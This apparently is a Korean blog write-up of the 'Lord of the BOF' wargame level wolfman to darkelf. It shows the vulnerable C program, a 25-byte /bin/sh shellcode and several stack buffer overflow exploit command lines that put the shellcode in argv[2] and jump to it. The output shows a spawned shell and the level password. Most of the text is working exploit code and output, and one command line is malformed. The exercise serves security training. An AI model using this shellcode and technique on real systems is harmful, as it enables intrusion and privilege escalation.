[lob] wolfman -> darkelf

[wolfman@localhost wolfman]$ cat darkelf.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[wolfman@localhost wolfman]$

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

25 byte shellcode

ltrace ./elf `python -c'print "a"*19"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'

ltrace ./elf `python -c'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'`

[wolfman@localhost wolfman]$ ./elf `python -c'print "a"*44+"\x45\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
//argv[2] 에 쉘코드를 올리고 그 주소로 점프

ltrace ./dark `python -c'print "a"*44+"\x0d\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[wolfman@localhost wolfman]$ ./darkelf `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?
bash$ my-pass
euid = 506
kernel crashed
bash$

저작자표시비영리동일조건

'공부 > LOB' 카테고리의 다른 글

[lob] orge -> troll  (0)	2014.07.30
[lob] darkelf -> orge  (0)	2014.07.30
[lob] wolfman -> darkelf  (0)	2014.07.30
[lob] orc -> wolfman  (0)	2014.07.30
[lob]goblin->orc  (0)	2014.07.30
[lob]cobolt->goblin  (0)	2014.07.30